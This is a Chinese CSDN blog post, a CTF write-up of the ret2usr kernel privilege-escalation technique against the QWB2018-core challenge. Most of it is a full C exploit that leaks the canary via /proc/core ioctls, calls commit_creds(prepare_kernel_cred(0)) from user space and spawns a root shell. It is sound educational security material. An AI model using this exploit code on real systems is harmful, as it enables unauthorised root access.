【kernel pwn】(叁)ret2usr

最新推荐文章于 2024-04-05 19:28:46 发布
最新推荐文章于 2024-04-05 19:28:46 发布
阅读量297 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115016110
版权

继续学习 kernel pwn 相关知识,同时记录一些方法。
本文以 QWB2018-core 为例

1.前置知识

ret2usr 利用了在不开 smep 时,用户空间进程不能访问内核空间,但是内核空间空间可以执行用户空间代码的这一特性。这样的话,就可以不用构造 rop 链,直接在内核空间跳到用户空间的 getshell 的代码上执行,这些 getshell 的代码可以自己编写,最终达到在非 root 用户下提权的目的。

2.题目分析

见 kernel pwn 系列二即可。

3.完整exp
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t user_cs,user_ss,user_rflags,user_sp;

size_t commit_creds=0,prepare_kernel_cred=0;

size_t vmlinux_base;

void save_status()
{
  __asm__(
    "mov user_cs,cs;"
    "mov user_ss,ss;"
    "mov user_sp,rsp;"
    "pushf;"
    "pop user_rflags;"
  );
  puts("[*] status has been saved.");

}

void BeRoot()
{
    char* (*fun1)(int) = prepare_kernel_cred;
    void  (*fun2)(char*) = commit_creds;
    (*fun2)((*fun1)(0));
}

void GetRootShell()
{
    if(!getuid()){
        system("/bin/sh");
    }
    else{
        puts("[*] get root shell error!");
    }
}

size_t FindVmlinuxBase()
{
    int fd = fopen("/tmp/kallsyms","r");
    if(fd == -1){
        puts("[*]open symbol file failed.");
    }
    char buf[0x30] = {0};
    while(fgets(buf,0x30,fd)){
        if(commit_creds && prepare_kernel_cred)
            return 0;
        if(strstr(buf,"commit_creds") && !commit_creds){
            char hex[0x20] = {0};
            strncpy(hex,buf,0x10);
            sscanf(hex,"%llx",&commit_creds);
            vmlinux_base = commit_creds - 0x9c8e0;
            printf("[*]vmlinux base => %llx\n",vmlinux_base);
        }
        if(strstr(buf,"prepare_kernel_cred") && !prepare_kernel_cred){
            char hex[0x20] = {0};
            strncpy(hex,buf,0x10);
            sscanf(hex,"%llx",&prepare_kernel_cred);
            vmlinux_base = prepare_kernel_cred - 0x9cce0;
            printf("[*]vmlinux base => %llx\n",vmlinux_base);
        }
    }
}

size_t raw_vmlinux_base = 0xffffffff81000000;

int main()
{
    save_status();
    FindVmlinuxBase();
    printf("[*]prepare_kernel_cred addr:%p\n",prepare_kernel_cred);
    printf("[*]commit_creds addr:%p\n",commit_creds);
    //leak sth
    int core_fd = open("/proc/core",2);
    char* user_buf = (char*)malloc(0x50*sizeof(char));
    memset(user_buf,0,sizeof(char)*0x50);
    //set off=0x40
    ioctl(core_fd,0x6677889C,0x40);
    //read to user_buf
    ioctl(core_fd,0x6677889B,user_buf);
    size_t canary = ((size_t*)user_buf)[0];
    printf("[*]leaked canary:%p",canary);
    //rops
    size_t rop[0x1000];
    int i = 0;
    size_t offset = vmlinux_base - raw_vmlinux_base;
    for(i=0;i<10;i++)
        rop[i] = canary;
    rop[i++] = BeRoot;
    rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
    rop[i++] = 0;

    rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret; 

    rop[i++] = (size_t)GetRootShell;         // rip 

    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;

    write(core_fd, rop, 0x800);
    ioctl(core_fd, 0x6677889a,0xffffffffffff0000 | (0x100));

    return 0;
}

在这里插入图片描述

那如果开了 smep 保护怎么办呢?
就是上一节记录的纯 rop 即可。

参考链接:
[1] https://ama2in9.top/2020/09/03/kernel/

、皮皮鸭
关注
专栏目录
kernel pwn ret2usr
qq_46441427的博客
11-08 157
思路 通过读取 /tmp/kallsyms 获取 commit_creds 和 prepare_kernel_cred 的方法相同,同时根据这些偏移能确定 gadget 的地址。 leak canary 的方法也相同,通过控制全局变量 off 读出 canary。 但是之后就不同了 rop的构造是执行函数commit_cred(prepare_kernel_cred(0))进行提升权限,通过swapgs; iretq返回用户态执行system_calll 而ret2usr是执行用户态中的commit_cre
Kernel pwn 基础教程之 ret2usr 与 bypass_smep
蚁景网安学院
03-16 476
一、前言 在我们的pwn学习过程中,能够很明显的感觉到开发人员们为了阻止某些利用手段而增加的保护机制,往往这些保护机制又会引发出新的bypass技巧,像是我们非常熟悉的Shellcode与...
linux内核提取ret2usr,Linux内核漏洞利用技术详解 Part 2
weixin_30970539的博客
05-07 388
前言在上一篇文章中,我们不仅为读者详细介绍了如何搭建环境,还通过一个具体的例子演示了最简单的内核漏洞利用技术:ret2usr。在本文中,我们将逐步启用更多的安全防御机制,即SMEP、KPTI和SMAP,并逐一解释它们将如何影响我们的漏洞利用方法,以及如何绕过这些防御机制。启用SMEP机制SMEP简介SMEP(Supervisormode execution protection,SMEP)机制的作...
linux内核提取ret2usr,[原创]Linux内核Ret2dir
weixin_39824191的博客
05-07 228
Linux内核Ret2dir(return-to-direct-mapped memory)论文地址:https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-kemerlis.pdf作者:哥伦比亚大学发表于: USENIX Security(%,计算机安全顶会)The strategy of retur...
linux内核提取ret2usr,Linux kernel pwn:ROP & ret2usr
weixin_30023527的博客
05-07 259
原标题:Linux kernel pwn:ROP & ret2usr 本文为看雪论精华文章看雪论坛作者ID:T1e9u前言这篇博文是我根据2018年强网杯的core题的利用姿势学习记录的,由于内核pwn相对于用户态的pwn来说复杂很多,而网上记载入门的博客都比较简略,所以这篇博文我会尽可能详细地记录,有错误的点希望师傅们斧正。前置知识内核pwn应该怎么pwn与用户态的pwn不一样,内核pw...
老表带你学Linux kernel pwn 入门(一)
weixin_43889007的博客
11-04 3524
不加任何保护机制的内核栈溢出提权
kernel pwn
nelson11112的博客
04-11 3615
比赛中的kernel pwn 比赛中我们会得到下面几个文件 正在上传…重新上传取消 bzImage 这是一个内核编译生成的压缩内核映像 core.cpio这是一个文件管理系统 针对core.cpio会有一系列常规操作 mkdir core cd core mv ../core.cpio core.cpio.gz // cp ../core.cpio core.cpio.gz gunzip core.cpio.gz cpio -idmv < core.cpio 然后我们在core..
【学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前
arttnba3的博客
02-25 588
【学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前[GITHUB BLOG ADDR](https://arttnba3.cn/2021/02/21/NOTE-0X02-LINUX-KERNEL-PWN-PART-I/)0x00.Linux Kernel Basic Knowledge一、内核内核架构:微内核 & 宏内核(单内核)宏内核(Monolithic Kernel,又叫单内核)微内核(Micro Kernel)二、分级保护域Intel Ring Model
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1506
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1312
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
linux内核提取ret2usr,kernel pwn(0):入门&ret2usr
weixin_29079643的博客
05-07 434
一、序言从栈、格式化串,再到堆,当这些基本的攻击面都过下来以后,对于劫持流程拿shell的过程就应该非常熟悉了,然而传统的exploit拿到的shell的权限并非最高的,而kernel pwn的核心目标就是拿到一个具有root权限的shell,其意义就在于提权。二、kernel pwn简介1.一般背景:内核pwn的背景一般都是Linux内核模块所出现的漏洞的利用。众所周知,Linux的内核被设置成...
linux内核提取ret2usr,Linux Kernel Exploit 内核漏洞学习(2)-ROP
weixin_30359265的博客
05-07 247
原标题:Linux Kernel Exploit 内核漏洞学习(2)-ROP 本文为看雪论坛精华文章看雪论坛作者ID:钞sir简介ROP的全称为Return-oriented Programming,主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。这种攻击方法在用户态的条件中运用的比较多,ret2shellcode...
linux内核提取ret2usr,Linux内核实验作业七
weixin_42526087的博客
05-07 217
实验作业:Linux内核如何装载和启动一个可执行程序20135313吴子怡.北京电子科技学院【第一部分】理解编译链接的过程和ELF可执行文件格式1.编译链接的过程2.ELF可执行文件格式一个可重定位(relocatable)文件保存着代码和适当的数据,用来和其他的object文件一起来创建一个可执行文件或者是一个共享文件。一个可执行(executable)文件保存着一个用来执行的程序;该文件指出了...
Linux内核 防御机制分析_内核栈保护机制,网络安全入门
最新发布
m0_61418075的博客
04-05 800
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
一步一步学ROP——shellcode和ret2libc
weixin_42390670的博客
07-23 1215
序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法。 1 C...
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 3935
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
缓冲区溢出漏洞-基本ROP-ret2lib
weixin_34114823的博客
04-16 869
本文视频: 如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514基础知识:第一题:ret2libc1我们先用IDA分析下有一个gets函数会有溢出漏洞,我们在查看下程序的有哪些保护可以看到开启了NX,说明我们在栈中的数据没有执行权限,我们需要使用ROP方式进行绕过我们使用gdb的pattern进行测试溢出偏移量是112...
利用ret2libc绕过DEP安全机制
_wells的博客
03-29 1169
文中的例子是引用了别人的,计作转载吧,具体哪里引用的忘记了数据执行保护:           DEP就是将非代码段的地址空间设置成不可执行属性,一旦系统从这些地址空间进行取指令时,CPU就是报内存违例异常,进而杀死进程。栈空间也被操作系统设置了不可执行属性,因此注入的Shellcode就无法执行了     导向系统库函数执行(ret2libc)攻击方法:        系统函数库(
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值